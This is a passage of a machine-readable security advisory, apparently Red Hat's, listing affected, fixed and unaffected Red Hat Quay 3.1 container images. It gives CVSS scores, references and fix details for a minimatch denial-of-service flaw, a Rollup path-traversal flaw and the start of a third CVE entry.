"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26996"
},
{
"category": "external",
"summary": "RHBZ#2441268",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441268"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26996",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26996"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996"
},
{
"category": "external",
"summary": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5",
"url": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5"
},
{
"category": "external",
"summary": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26",
"url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26"
}
],
"release_date": "2026-02-20T03:05:21.105000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "minimatch: minimatch: Denial of Service via specially crafted glob patterns"
},
{
"cve": "CVE-2026-27606",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2026-02-25T04:01:24.449922+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442530"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Rollup, a JavaScript module bundler. Insecure file name sanitization in the core engine allows an attacker to control output filenames, potentially through command-line interface (CLI) inputs, manual chunk aliases, or malicious plugins. By using directory traversal sequences (`../`), an attacker can overwrite files anywhere on the host filesystem where the build process has write permissions. This vulnerability can lead to persistent remote code execution (RCE) by overwriting critical system or user configuration files.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "rollup: Rollup: Remote Code Execution via Path Traversal Vulnerability",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "RHBZ#2442530",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442530"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27606",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27606"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27606",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27606"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2",
"url": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e",
"url": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3",
"url": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v2.80.0",
"url": "https://github.com/rollup/rollup/releases/tag/v2.80.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v3.30.0",
"url": "https://github.com/rollup/rollup/releases/tag/v3.30.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v4.59.0",
"url": "https://github.com/rollup/rollup/releases/tag/v4.59.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc",
"url": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc"
}
],
"release_date": "2026-02-25T02:08:06.682000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "rollup: Rollup: Remote Code Execution via Path Traversal Vulnerability"
},
{
"cve": "CVE-2026-27628",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"discovery_date": "2026-02-25T04:02:09.864561+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
